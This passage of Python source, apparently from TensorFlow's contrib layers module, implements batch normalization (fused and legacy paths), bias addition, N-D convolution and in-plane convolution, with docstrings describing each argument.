    # Remember the incoming shape so a rank-2 input can be restored to its
    # original shape after the (4-D only) fused op runs.
    original_shape = inputs.get_shape()
    original_inputs = inputs
    original_rank = original_shape.ndims
    if original_rank is None:
      raise ValueError('Inputs %s has undefined rank' % inputs.name)
    elif original_rank not in [2, 4]:
      raise ValueError('Inputs %s has unsupported rank.'
                       ' Expected 2 or 4 but got %d' % (
                           inputs.name, original_rank))
    if original_rank == 2:
      # The fused kernel only accepts 4-D tensors, so a rank-2 input is
      # temporarily reshaped to have singleton spatial dimensions.
      channels = inputs.get_shape()[-1].value
      if channels is None:
        raise ValueError('`C` dimension must be known but is None')
      new_shape = [-1, 1, 1, channels]
      if data_format == DATA_FORMAT_NCHW:
        new_shape = [-1, channels, 1, 1]
      inputs = array_ops.reshape(inputs, new_shape)
    inputs_shape = inputs.get_shape()
    dtype = inputs.dtype.base_dtype
    if data_format == DATA_FORMAT_NHWC:
      params_shape = inputs_shape[-1:]
    else:
      params_shape = inputs_shape[1:2]
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined `C` dimension %s.' %
                       (inputs.name, params_shape))
    # Allocate parameters for the beta and gamma of the normalization.
    trainable_beta = trainable and center
    beta_collections = utils.get_variable_collections(variables_collections,
                                                      'beta')
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      beta = variables.model_variable(
          'beta',
          shape=params_shape,
          dtype=dtype,
          initializer=beta_initializer,
          collections=beta_collections,
          trainable=trainable_beta)
    else:
      # The fused op always needs beta/gamma tensors; use constants when the
      # corresponding learned parameter is disabled.
      beta = array_ops.constant(0.0, shape=params_shape)
    if scale:
      gamma_collections = utils.get_variable_collections(
          variables_collections, 'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      gamma = variables.model_variable(
          'gamma',
          shape=params_shape,
          dtype=dtype,
          initializer=gamma_initializer,
          collections=gamma_collections,
          trainable=trainable)
    else:
      gamma = array_ops.constant(1.0, shape=params_shape)
    # Create moving_mean and moving_variance variables and add them to the
    # appropriate collections.
    moving_mean_collections = utils.get_variable_collections(
        variables_collections, 'moving_mean')
    moving_mean_initializer = param_initializers.get(
        'moving_mean', init_ops.zeros_initializer())
    moving_mean = variables.model_variable(
        'moving_mean',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_mean_initializer,
        trainable=False,
        collections=moving_mean_collections)
    moving_variance_collections = utils.get_variable_collections(
        variables_collections, 'moving_variance')
    moving_variance_initializer = param_initializers.get(
        'moving_variance', init_ops.ones_initializer())
    moving_variance = variables.model_variable(
        'moving_variance',
        shape=params_shape,
        dtype=dtype,
        initializer=moving_variance_initializer,
        trainable=False,
        collections=moving_variance_collections)
    def _fused_batch_norm_training():
      # Training branch: statistics come from the current batch.
      return nn.fused_batch_norm(
          inputs, gamma, beta, epsilon=epsilon, data_format=data_format)
    def _fused_batch_norm_inference():
      # Inference branch: the accumulated moving statistics are used.
      return nn.fused_batch_norm(
          inputs,
          gamma,
          beta,
          mean=moving_mean,
          variance=moving_variance,
          epsilon=epsilon,
          is_training=False,
          data_format=data_format)
    outputs, mean, variance = utils.smart_cond(is_training,
                                               _fused_batch_norm_training,
                                               _fused_batch_norm_inference)
    # If `is_training` doesn't have a constant value, because it is a `Tensor`,
    # a `Variable` or `Placeholder` then is_training_value will be None and
    # `need_updates` will be true.
    is_training_value = utils.constant_value(is_training)
    need_updates = is_training_value is None or is_training_value
    if need_updates:
      if updates_collections is None:
        # No collection given: force the moving-average updates to run as
        # control dependencies of the output itself.
        no_updates = lambda: outputs
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          with ops.control_dependencies(
              [update_moving_mean, update_moving_variance]):
            return array_ops.identity(outputs)
        outputs = utils.smart_cond(is_training, _force_updates, no_updates)
      else:
        # Otherwise place the update ops in `updates_collections`; the caller
        # is responsible for running them (typically with the train_op).
        moving_vars_fn = lambda: (moving_mean, moving_variance)
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          return update_moving_mean, update_moving_variance
        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
    outputs.set_shape(inputs_shape)
    if original_shape.ndims == 2:
      # Undo the temporary 4-D reshape applied above for rank-2 inputs.
      outputs = array_ops.reshape(outputs, array_ops.shape(original_inputs))
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def batch_norm(inputs,
               decay=0.999,
               center=True,
               scale=False,
               epsilon=0.001,
               activation_fn=None,
               param_initializers=None,
               param_regularizers=None,
               updates_collections=ops.GraphKeys.UPDATE_OPS,
               is_training=True,
               reuse=None,
               variables_collections=None,
               outputs_collections=None,
               trainable=True,
               batch_weights=None,
               fused=None,
               data_format=DATA_FORMAT_NHWC,
               zero_debias_moving_mean=False,
               scope=None,
               renorm=False,
               renorm_clipping=None,
               renorm_decay=0.99):
  """Adds a Batch Normalization layer from http://arxiv.org/abs/1502.03167.
  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift"
  Sergey Ioffe, Christian Szegedy
  Can be used as a normalizer function for conv2d and fully_connected.
  Note: when training, the moving_mean and moving_variance need to be updated.
  By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
  need to be added as a dependency to the `train_op`. For example:
  ```python
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
      train_op = optimizer.minimize(loss)
  ```
  One can set updates_collections=None to force the updates in place, but that
  can have a speed penalty, especially in distributed settings.
  Args:
    inputs: A tensor with 2 or more dimensions, where the first dimension has
      `batch_size`. The normalization is over all but the last dimension if
      `data_format` is `NHWC` and the second dimension if `data_format` is
      `NCHW`.
    decay: Decay for the moving average. Reasonable values for `decay` are close
      to 1.0, typically in the multiple-nines range: 0.999, 0.99, 0.9, etc.
      Lower `decay` value (recommend trying `decay`=0.9) if model experiences
      reasonably good training performance but poor validation and/or test
      performance. Try zero_debias_moving_mean=True for improved stability.
    center: If True, add offset of `beta` to normalized tensor. If False, `beta`
      is ignored.
    scale: If True, multiply by `gamma`. If False, `gamma` is
      not used. When the next layer is linear (also e.g. `nn.relu`), this can be
      disabled since the scaling can be done by the next layer.
    epsilon: Small float added to variance to avoid dividing by zero.
    activation_fn: Activation function, default set to None to skip it and
      maintain a linear activation.
    param_initializers: Optional initializers for beta, gamma, moving mean and
      moving variance.
    param_regularizers: Optional regularizer for beta and gamma.
    updates_collections: Collections to collect the update ops for computation.
      The updates_ops need to be executed with the train_op.
      If None, a control dependency would be added to make sure the updates are
      computed in place.
    is_training: Whether or not the layer is in training mode. In training mode
      it would accumulate the statistics of the moments into `moving_mean` and
      `moving_variance` using an exponential moving average with the given
      `decay`. When it is not in training mode then it would use the values of
      the `moving_mean` and the `moving_variance`.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional collections for the variables.
    outputs_collections: Collections to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
    batch_weights: An optional tensor of shape `[batch_size]`,
      containing a frequency weight for each batch item. If present,
      then the batch normalization uses weighted mean and
      variance. (This can be used to correct for bias in training
      example selection.)
    fused: if `True`, use a faster, fused implementation if possible.
      If `None`, use the system recommended implementation.
    data_format: A string. `NHWC` (default) and `NCHW` are supported.
    zero_debias_moving_mean: Use zero_debias for moving_mean. It creates a new
      pair of variables 'moving_mean/biased' and 'moving_mean/local_step'.
    scope: Optional scope for `variable_scope`.
    renorm: Whether to use Batch Renormalization
      (https://arxiv.org/abs/1702.03275). This adds extra variables during
      training. The inference is the same for either value of this parameter.
    renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
      scalar `Tensors` used to clip the renorm correction. The correction
      `(r, d)` is used as `corrected_value = normalized_value * r + d`, with
      `r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
      dmax are set to inf, 0, inf, respectively.
    renorm_decay: Momentum used to update the moving means and standard
      deviations with renorm. Unlike `momentum`, this affects training
      and should be neither too small (which would add noise) nor too large
      (which would give stale estimates). Note that `decay` is still applied
      to get the means and variances for inference.
  Returns:
    A `Tensor` representing the output of the operation.
  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: If the rank of `inputs` is undefined.
    ValueError: If rank or channels dimension of `inputs` is undefined.
  """
  # This environment variable is only used during the testing period of fused
  # batch norm and will be removed after that.
  if fused is None:
    fused = _FUSED_DEFAULT

  # Only use _fused_batch_norm if all of the following three
  # conditions are true:
  # (1) fused is set True;
  # (2) it is possible to use (currently it doesn't support batch weights,
  #   renorm, and the case when rank is neither 2 nor 4);
  # (3) it is used with zero_debias_moving_mean, or an input shape of rank 2,
  #   or non-default updates_collections (not implemented in
  #   normalization_layers.BatchNormalization yet); otherwise use the fused
  #   implementation in normalization_layers.BatchNormalization.
  inputs = ops.convert_to_tensor(inputs)
  rank = inputs.get_shape().ndims
  possible_to_fuse = batch_weights is None and not renorm and rank in [2, 4]
  if fused and possible_to_fuse and (
      zero_debias_moving_mean or rank == 2 or
      updates_collections is not ops.GraphKeys.UPDATE_OPS):
    # Dispatch to the fused implementation; note it does not take the
    # renorm/batch_weights/param_regularizers arguments (excluded above).
    return _fused_batch_norm(
        inputs,
        decay=decay,
        center=center,
        scale=scale,
        epsilon=epsilon,
        activation_fn=activation_fn,
        param_initializers=param_initializers,
        updates_collections=updates_collections,
        is_training=is_training,
        reuse=reuse,
        variables_collections=variables_collections,
        outputs_collections=outputs_collections,
        trainable=trainable,
        data_format=data_format,
        zero_debias_moving_mean=zero_debias_moving_mean,
        scope=scope)

  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')

  layer_variable_getter = _build_variable_getter()
  with variable_scope.variable_scope(
      scope, 'BatchNorm', [inputs], reuse=reuse,
      custom_getter=layer_variable_getter) as sc:
    inputs = ops.convert_to_tensor(inputs)

    # Determine whether we can use the core layer class.
    if (batch_weights is None and
        updates_collections is ops.GraphKeys.UPDATE_OPS and
        not zero_debias_moving_mean):
      # Use the core layer class.
      axis = 1 if data_format == DATA_FORMAT_NCHW else -1
      if not param_initializers:
        param_initializers = {}
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      if not param_regularizers:
        param_regularizers = {}
      beta_regularizer = param_regularizers.get('beta')
      gamma_regularizer = param_regularizers.get('gamma')
      layer = normalization_layers.BatchNormalization(
          axis=axis,
          momentum=decay,
          epsilon=epsilon,
          center=center,
          scale=scale,
          beta_initializer=beta_initializer,
          gamma_initializer=gamma_initializer,
          moving_mean_initializer=moving_mean_initializer,
          moving_variance_initializer=moving_variance_initializer,
          beta_regularizer=beta_regularizer,
          gamma_regularizer=gamma_regularizer,
          trainable=trainable,
          renorm=renorm,
          renorm_clipping=renorm_clipping,
          renorm_momentum=renorm_decay,
          name=sc.name,
          _scope=sc,
          _reuse=reuse,
          fused=fused)
      outputs = layer.apply(inputs, training=is_training)

      # Add variables to collections.
      _add_variable_to_collections(
          layer.moving_mean, variables_collections, 'moving_mean')
      _add_variable_to_collections(
          layer.moving_variance, variables_collections, 'moving_variance')
      if layer.beta is not None:
        _add_variable_to_collections(layer.beta, variables_collections, 'beta')
      if layer.gamma is not None:
        _add_variable_to_collections(
            layer.gamma, variables_collections, 'gamma')

      if activation_fn is not None:
        outputs = activation_fn(outputs)
      return utils.collect_named_outputs(outputs_collections,
                                         sc.original_name_scope, outputs)

    # Not supported by layer class: batch_weights argument,
    # and custom updates_collections. In that case, use the legacy BN
    # implementation.
    # Custom updates collections are not supported because the update logic
    # is different in this case, in particular w.r.t. "forced updates" and
    # update op reuse.
    if renorm:
      # Renorm is only available through the core layer path above.
      raise ValueError('renorm is not supported with batch_weights, '
                       'updates_collections or zero_debias_moving_mean')
    inputs_shape = inputs.get_shape()
    inputs_rank = inputs_shape.ndims
    if inputs_rank is None:
      raise ValueError('Inputs %s has undefined rank.' % inputs.name)
    dtype = inputs.dtype.base_dtype
    if batch_weights is not None:
      batch_weights = ops.convert_to_tensor(batch_weights)
      inputs_shape[0:1].assert_is_compatible_with(batch_weights.get_shape())
      # Reshape batch weight values so they broadcast across inputs.
      nshape = [-1] + [1 for _ in range(inputs_rank - 1)]
      batch_weights = array_ops.reshape(batch_weights, nshape)

    if data_format == DATA_FORMAT_NCHW:
      moments_axes = [0] + list(range(2, inputs_rank))
      params_shape = inputs_shape[1:2]
      # For NCHW format, rather than relying on implicit broadcasting, we
      # explicitly reshape the params to params_shape_broadcast when computing
      # the moments and the batch normalization.
      params_shape_broadcast = list(
          [1, inputs_shape[1].value] + [1 for _ in range(2, inputs_rank)])
    else:
      moments_axes = list(range(inputs_rank - 1))
      params_shape = inputs_shape[-1:]
      params_shape_broadcast = None
    if not params_shape.is_fully_defined():
      raise ValueError('Inputs %s has undefined channels dimension %s.' % (
          inputs.name, params_shape))

    # Allocate parameters for the beta and gamma of the normalization.
    beta, gamma = None, None
    if not param_initializers:
      param_initializers = {}
    if center:
      beta_collections = utils.get_variable_collections(variables_collections,
                                                        'beta')
      beta_initializer = param_initializers.get('beta',
                                                init_ops.zeros_initializer())
      beta = variables.model_variable('beta',
                                      shape=params_shape,
                                      dtype=dtype,
                                      initializer=beta_initializer,
                                      collections=beta_collections,
                                      trainable=trainable)
    if scale:
      gamma_collections = utils.get_variable_collections(variables_collections,
                                                         'gamma')
      gamma_initializer = param_initializers.get('gamma',
                                                 init_ops.ones_initializer())
      gamma = variables.model_variable('gamma',
                                       shape=params_shape,
                                       dtype=dtype,
                                       initializer=gamma_initializer,
                                       collections=gamma_collections,
                                       trainable=trainable)

    # Create moving_mean and moving_variance variables and add them to the
    # appropriate collections. We disable variable partitioning while creating
    # them, because assign_moving_average is not yet supported for partitioned
    # variables.
    partitioner = variable_scope.get_variable_scope().partitioner
    try:
      variable_scope.get_variable_scope().set_partitioner(None)
      moving_mean_collections = utils.get_variable_collections(
          variables_collections, 'moving_mean')
      moving_mean_initializer = param_initializers.get(
          'moving_mean', init_ops.zeros_initializer())
      moving_mean = variables.model_variable(
          'moving_mean',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_mean_initializer,
          trainable=False,
          collections=moving_mean_collections)
      moving_variance_collections = utils.get_variable_collections(
          variables_collections, 'moving_variance')
      moving_variance_initializer = param_initializers.get(
          'moving_variance', init_ops.ones_initializer())
      moving_variance = variables.model_variable(
          'moving_variance',
          shape=params_shape,
          dtype=dtype,
          initializer=moving_variance_initializer,
          trainable=False,
          collections=moving_variance_collections)
    finally:
      # Always restore the caller's partitioner, even if variable creation
      # raised.
      variable_scope.get_variable_scope().set_partitioner(partitioner)

    # If `is_training` doesn't have a constant value, because it is a `Tensor`,
    # a `Variable` or `Placeholder` then is_training_value will be None and
    # `needs_moments` will be true.
    is_training_value = utils.constant_value(is_training)
    need_moments = is_training_value is None or is_training_value
    if need_moments:
      # Calculate the moments based on the individual batch.
      if batch_weights is None:
        if data_format == DATA_FORMAT_NCHW:
          mean, variance = nn.moments(inputs, moments_axes, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.moments(inputs, moments_axes)
      else:
        if data_format == DATA_FORMAT_NCHW:
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights, keep_dims=True)
          mean = array_ops.reshape(mean, [-1])
          variance = array_ops.reshape(variance, [-1])
        else:
          mean, variance = nn.weighted_moments(inputs, moments_axes,
                                               batch_weights)

      moving_vars_fn = lambda: (moving_mean, moving_variance)
      if updates_collections is None:
        # Force the moving-average updates to run in-place as control
        # dependencies of the returned statistics.
        def _force_updates():
          """Internal function forces updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          with ops.control_dependencies([update_moving_mean,
                                         update_moving_variance]):
            return array_ops.identity(mean), array_ops.identity(variance)
        mean, variance = utils.smart_cond(is_training,
                                          _force_updates,
                                          moving_vars_fn)
      else:
        # Place the update ops in `updates_collections`; the caller must run
        # them (typically as dependencies of the train_op).
        def _delay_updates():
          """Internal function that delay updates moving_vars if is_training."""
          update_moving_mean = moving_averages.assign_moving_average(
              moving_mean, mean, decay, zero_debias=zero_debias_moving_mean)
          update_moving_variance = moving_averages.assign_moving_average(
              moving_variance, variance, decay, zero_debias=False)
          return update_moving_mean, update_moving_variance

        update_mean, update_variance = utils.smart_cond(is_training,
                                                        _delay_updates,
                                                        moving_vars_fn)
        ops.add_to_collections(updates_collections, update_mean)
        ops.add_to_collections(updates_collections, update_variance)
        # Use computed moments during training and moving_vars otherwise.
        vars_fn = lambda: (mean, variance)
        mean, variance = utils.smart_cond(is_training, vars_fn, moving_vars_fn)
    else:
      mean, variance = moving_mean, moving_variance
    if data_format == DATA_FORMAT_NCHW:
      # Reshape params to broadcast explicitly over NCHW inputs (see note
      # above at params_shape_broadcast).
      mean = array_ops.reshape(mean, params_shape_broadcast)
      variance = array_ops.reshape(variance, params_shape_broadcast)
      if beta is not None:
        beta = array_ops.reshape(beta, params_shape_broadcast)
      if gamma is not None:
        gamma = array_ops.reshape(gamma, params_shape_broadcast)

    # Compute batch_normalization.
    outputs = nn.batch_normalization(inputs, mean, variance, beta, gamma,
                                     epsilon)
    outputs.set_shape(inputs_shape)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def bias_add(inputs,
             activation_fn=None,
             initializer=init_ops.zeros_initializer(),
             regularizer=None,
             reuse=None,
             variables_collections=None,
             outputs_collections=None,
             trainable=True,
             data_format=DATA_FORMAT_NHWC,
             scope=None):
  """Adds a bias to the inputs.

  Can be used as a normalizer function for conv2d and fully_connected.

  Args:
    inputs: A tensor of rank at least 2 whose last (or, for NCHW, second)
      dimension is statically known, e.g. `[batch_size, depth]` or
      `[None, None, None, depth]`.
    activation_fn: Activation function; None (the default) keeps a linear
      activation.
    initializer: Initializer for the bias variable, defaults to zeros.
    regularizer: Optional regularizer for the bias (e.g. the result of
      `l1_regularizer` or `l2_regularizer`).
    reuse: Whether the layer and its variables should be reused; requires
      `scope` to be given.
    variables_collections: Optional collections for the bias variable.
    outputs_collections: Collections the output tensor is added to.
    trainable: If `True` the bias is also added to
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    data_format: Either 'NHWC' or 'NCHW'.
    scope: Optional scope for variable_scope.

  Returns:
    A tensor with the biases added to `inputs`.

  Raises:
    ValueError: If `data_format` is neither `NHWC` nor `NCHW`.
    ValueError: If `data_format` is `NCHW` and rank of `inputs` is not 4.
    ValueError: If the rank of `inputs` is undefined.
    ValueError: If rank or `C` dimension of `inputs` is undefined.
  """
  if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
    raise ValueError('data_format has to be either NCHW or NHWC.')
  with variable_scope.variable_scope(
      scope, 'BiasAdd', [inputs], reuse=reuse) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    shape = tensor_in.get_shape()
    rank = shape.ndims
    # Guard clauses: rank must be statically known, and NCHW only works on
    # 4-D tensors.
    if rank is None:
      raise ValueError('Dims of shape must be known but is None')
    if data_format == DATA_FORMAT_NCHW and rank != 4:
      raise ValueError('Data format NCHW only supports 4D Tensor')
    channel_axis = 1 if data_format == DATA_FORMAT_NCHW else -1
    depth = shape[channel_axis].value
    if depth is None:
      raise ValueError('`C` dimension must be known but is None')
    bias_collections = utils.get_variable_collections(
        variables_collections, 'biases')
    biases = variables.model_variable(
        'biases',
        shape=[depth],
        dtype=tensor_in.dtype.base_dtype,
        initializer=initializer,
        regularizer=regularizer,
        collections=bias_collections,
        trainable=trainable)
    outputs = nn.bias_add(tensor_in, biases, data_format=data_format)
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, outputs)
# TODO(jbms): change `rate` parameter to `dilation_rate` for consistency with
# underlying op.
@add_arg_scope
def convolution(inputs,
                num_outputs,
                kernel_size,
                stride=1,
                padding='SAME',
                data_format=None,
                rate=1,
                activation_fn=nn.relu,
                normalizer_fn=None,
                normalizer_params=None,
                weights_initializer=initializers.xavier_initializer(),
                weights_regularizer=None,
                biases_initializer=init_ops.zeros_initializer(),
                biases_regularizer=None,
                reuse=None,
                variables_collections=None,
                outputs_collections=None,
                trainable=True,
                scope=None):
  """Adds an N-D convolution followed by an optional batch_norm layer.

  Requires 1 <= N <= 3; the spatial rank N is inferred from the rank of
  `inputs` (N+2). A `weights` variable holding the convolution kernel is
  created and cross-correlated with `inputs`. If `normalizer_fn` is given
  (e.g. `batch_norm`) it is applied to the result; otherwise, when
  `biases_initializer` is provided, a `biases` variable is created and added.
  `activation_fn`, if not None, is applied last.

  Atrous (dilated) convolution is performed when any dimension of `rate` is
  greater than 1; in that case all `stride` values must be 1.

  Args:
    inputs: A Tensor of rank N+2, channels-last
      (`[batch_size] + spatial_shape + [in_channels]`) unless `data_format`
      starts with "NC", in which case channels-first.
    num_outputs: Integer, the number of output filters.
    kernel_size: Sequence of N positive integers giving the filter's spatial
      dimensions, or a single int used for all of them.
    stride: Sequence of N positive integers (or a single int) giving the
      output stride. Any value != 1 is incompatible with `rate` != 1.
    padding: One of `"VALID"` or `"SAME"`.
    data_format: None or a format string. For N=1: "NWC" (default) / "NCW";
      N=2: "NHWC" (default) / "NCHW"; N=3: "NDHWC" (default) / "NCDHW".
    rate: Sequence of N positive integers (or a single int) giving the
      dilation rate. Any value != 1 is incompatible with `stride` != 1.
    activation_fn: Activation function; defaults to ReLU. Set to None for a
      linear activation.
    normalizer_fn: Normalization function used instead of `biases`; when
      given, `biases_initializer` and `biases_regularizer` are ignored and no
      biases are created.
    normalizer_params: Parameters passed to `normalizer_fn`.
    weights_initializer: Initializer for the kernel weights.
    weights_regularizer: Optional regularizer for the kernel weights.
    biases_initializer: Initializer for the biases; None skips biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether the layer and its variables should be reused; requires
      `scope` to be given.
    variables_collections: Optional list of collections for all the variables,
      or a dictionary with a separate list per variable.
    outputs_collections: Collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for `variable_scope`.

  Returns:
    A tensor representing the output of the operation.

  Raises:
    ValueError: If `data_format` is invalid.
    ValueError: Both 'rate' and `stride` are not uniformly 1.
  """
  if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
    raise ValueError('Invalid data_format: %r' % (data_format,))

  getter = _build_variable_getter({'bias': 'biases', 'kernel': 'weights'})
  with variable_scope.variable_scope(
      scope, 'Conv', [inputs], reuse=reuse, custom_getter=getter) as sc:
    tensor_in = ops.convert_to_tensor(inputs)
    rank = tensor_in.get_shape().ndims
    # Pick the core layer class from the input rank (spatial rank = rank - 2).
    rank_to_layer = {
        3: convolutional_layers.Convolution1D,
        4: convolutional_layers.Convolution2D,
        5: convolutional_layers.Convolution3D,
    }
    if rank not in rank_to_layer:
      raise ValueError('Convolution not supported for input with rank',
                       rank)
    channel_layout = ('channels_first'
                      if data_format and data_format.startswith('NC')
                      else 'channels_last')
    layer = rank_to_layer[rank](
        filters=num_outputs,
        kernel_size=kernel_size,
        strides=stride,
        padding=padding,
        data_format=channel_layout,
        dilation_rate=rate,
        activation=None,
        use_bias=not normalizer_fn and biases_initializer,
        kernel_initializer=weights_initializer,
        bias_initializer=biases_initializer,
        kernel_regularizer=weights_regularizer,
        bias_regularizer=biases_regularizer,
        activity_regularizer=None,
        trainable=trainable,
        name=sc.name,
        dtype=tensor_in.dtype.base_dtype,
        _scope=sc,
        _reuse=reuse)
    outputs = layer.apply(tensor_in)

    # Add variables to collections.
    _add_variable_to_collections(layer.kernel, variables_collections,
                                 'weights')
    if layer.use_bias:
      _add_variable_to_collections(layer.bias, variables_collections, 'biases')

    if normalizer_fn is not None:
      outputs = normalizer_fn(outputs, **(normalizer_params or {}))
    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(
        outputs_collections, sc.original_name_scope, outputs)
# `convolution` infers the spatial rank from the rank of its input, so the
# 2-D and 3-D entry points are plain aliases of the same implementation.
convolution2d = convolution
convolution3d = convolution
@add_arg_scope
def convolution2d_in_plane(
    inputs,
    kernel_size,
    stride=1,
    padding='SAME',
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Convolves every channel of `inputs` independently with one shared kernel.

  A single `[kernel_height, kernel_width]` filter is learned and applied to
  each input channel via a depthwise convolution. This is useful for simple
  channel-independent operations such as image gradients:

    image = tf.constant(..., shape=(16, 240, 320, 3))
    vert_gradients = layers.conv2d_in_plane(image,
                                            kernel=[1, -1],
                                            kernel_size=[2, 1])
    horz_gradients = layers.conv2d_in_plane(image,
                                            kernel=[1, -1],
                                            kernel_size=[1, 2])

  Args:
    inputs: A 4-D tensor with dimensions [batch_size, height, width, channels].
    kernel_size: A list of length 2 holding the [kernel_height, kernel_width]
      of the pooling. Can be an int if both values are the same.
    stride: A list of length 2 `[stride_height, stride_width]`. Can be an int
      if both strides are the same. Note that presently both strides must have
      the same value.
    padding: The padding type to use, either 'SAME' or 'VALID'.
    activation_fn: Activation function. The default value is a ReLU function.
      Explicitly set it to None to skip it and maintain a linear activation.
    normalizer_fn: Normalization function to use instead of `biases`. If
      `normalizer_fn` is provided then `biases_initializer` and
      `biases_regularizer` are ignored and `biases` are not created nor added.
      Default is None, meaning no normalizer function.
    normalizer_params: Normalization function parameters.
    weights_initializer: An initializer for the weights.
    weights_regularizer: Optional regularizer for the weights.
    biases_initializer: An initializer for the biases. If None skip biases.
    biases_regularizer: Optional regularizer for the biases.
    reuse: Whether or not the layer and its variables should be reused. To be
      able to reuse the layer scope must be given.
    variables_collections: Optional list of collections for all the variables
      or a dictionary containing a different list of collection per variable.
    outputs_collections: Collection to add the outputs.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    scope: Optional scope for `variable_scope`.

  Returns:
    A `Tensor` representing the output of the operation.
  """
  with variable_scope.variable_scope(
      scope, 'ConvInPlane', [inputs], reuse=reuse) as sc:
    base_dtype = inputs.dtype.base_dtype
    k_h, k_w = utils.two_element_tuple(kernel_size)
    s_h, s_w = utils.two_element_tuple(stride)
    channels = utils.last_dimension(inputs.get_shape(), min_rank=4)

    # One shared [k_h, k_w, 1, 1] filter; tiled across all input channels so
    # depthwise_conv2d applies the identical kernel per channel.
    kernel = variables.model_variable(
        'weights',
        shape=[k_h, k_w, 1, 1],
        dtype=base_dtype,
        initializer=weights_initializer,
        regularizer=weights_regularizer,
        collections=utils.get_variable_collections(
            variables_collections, 'weights'),
        trainable=trainable)
    tiled_kernel = array_ops.tile(kernel, [1, 1, channels, 1])
    outputs = nn.depthwise_conv2d(inputs, tiled_kernel,
                                  [1, s_h, s_w, 1], padding)

    if normalizer_fn is not None:
      # Normalizer replaces the bias term entirely.
      outputs = normalizer_fn(outputs, **(normalizer_params or {}))
    elif biases_initializer is not None:
      bias_var = variables.model_variable(
          'biases',
          shape=[channels,],
          dtype=base_dtype,
          initializer=biases_initializer,
          regularizer=biases_regularizer,
          collections=utils.get_variable_collections(
              variables_collections, 'biases'),
          trainable=trainable)
      outputs = nn.bias_add(outputs, bias_var)

    if activation_fn is not None:
      outputs = activation_fn(outputs)
    return utils.collect_named_outputs(outputs_collections,
                                       sc.original_name_scope, outputs)
@add_arg_scope
def convolution2d_transpose(
    inputs,
    num_outputs,
    kernel_size,
    stride=1,
    padding='SAME',
    data_format=DATA_FORMAT_NHWC,
    activation_fn=nn.relu,
    normalizer_fn=None,
    normalizer_params=None,
    weights_initializer=initializers.xavier_initializer(),
    weights_regularizer=None,
    biases_initializer=init_ops.zeros_initializer(),
    biases_regularizer=None,
    reuse=None,
    variables_collections=None,
    outputs_collections=None,
    trainable=True,
    scope=None):
  """Adds a convolution2d_transpose with an optional batch normalization layer.

  The function creates a variable called `weights`, representing the
  kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
  second variable called 'biases' is added to the result of the operation.

  Args:
    inputs: A 4-D `Tensor` of type `float` and shape
      `[batch, height, width, in_channels]` for `NHWC` data format or
      `[batch, in_channels, height, width]` for `NCHW` data format.
